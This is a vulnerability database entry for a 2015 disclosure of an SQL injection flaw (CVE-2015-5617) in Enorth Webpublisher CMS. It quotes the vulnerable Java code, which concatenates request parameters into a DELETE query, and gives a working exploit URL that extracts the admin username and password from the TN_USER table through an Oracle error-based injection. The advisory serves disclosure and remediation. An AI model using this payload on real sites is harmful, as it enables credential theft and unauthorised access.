Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtXin.wang1337DAY-ID-24040
HistoryAug 14, 2015 - 12:00 a.m.

Enorth Webpublisher CMS SQL Injection Vulnerability

2015-08-1400:00:00
xin.wang
0day.today
28

0.004 Low

EPSS

Percentile

73.2%

JSON

Enorth Webpublisher CMS suffers from a remote SQL injection vulnerability.

Title:
====
[CVE-2015-5617]Enorth Webpublisher CMS  SQL Injection from delete_pending_news.jsp cbNewsid 


Vendor:
======
http://products.enorth.com.cn/bfnrglxt/index.shtml
Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users. 


Versions Affected: 
==============
All versions


Author: 
======
xin.wang(xin.wang(at)dbappsecurity.com.cn)


Vulnerability Description:
====================
/pub/m_pending_news/delete_pending_news.jsp
<%
String[] newsIdGroup;

newsIdGroup = request.getParameterValues("cbNewsId");
if (newsIdGroup == null || newsIdGroup.length == 0) {
  throw new P3Exception("mbx_news_submit_empty_news_id");
} else {
    penTran.deletePendingNews(newsIdGroup);
}
%>

/WEB-INF/classes/cn/com/enorth/pub3/m_news/PendingNewsBean.class

  public void deletePendingNews(String[] newsIds) throws Exception {
    Connection cn = null;
    PreparedStatement pstm = null;
    try {
      StringBuffer buf = new StringBuffer();
      buf.append("delete from tn_pending_news where news_id in (");
      int i = 0; for (int len = newsIds.length; i < len; i++) {
        buf.append(newsIds[i]).append(",");
      }
      buf.append("-1)");
      cn = P3DBTools.getPubConnection();
      pstm = cn.prepareStatement(buf.toString());
      pstm.executeUpdate();//执行
      cn.commit();
    } catch (Exception ex) {
      P3DBTools.rollback(cn);
      throw ex;
    } finally {
      P3DBTools.freeConnection(cn);
    }
  }
}


Exploit:
======
http://website.com/pub/m_pending_news/delete_pending_news.jsp?cbNewsId=2222)%20and%201=ctxsys.drithsx.sn(1,(select%20USER_NAME||PASS_WORD%20from%20TN_USER%20WHERE%20USER_ID=1))—



Vulnerability Disclosure Timeline:

===========================
2015-07-28        Found The Vulnerability
2015-08-02        Submitted To The Vendor
2015-08-03        Fixed
2015-08-13        Public Disclosure

#  0day.today [2018-04-09]  #

Related

cve 1
packetstorm 1
nvd 1
seebug 1
prion 1
cvelist 1
cve
cve
CVE-2015-5617
2020-02-12 15:15:11
packetstorm
packetstorm
Enorth Webpublisher CMS SQL Injection
2015-08-13 00:00:00
nvd
nvd
CVE-2015-5617
2020-02-12 15:15:11
seebug
seebug
Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp
2015-09-02 00:00:00
prion
prion
Sql injection
2020-02-12 15:15:00
cvelist
cvelist
CVE-2015-5617
2020-02-12 14:30:26

0.004 Low

EPSS

Percentile

73.2%

JSON
Related for 1337DAY-ID-24040
cve1packetstorm1nvd1seebug1prion1cvelist1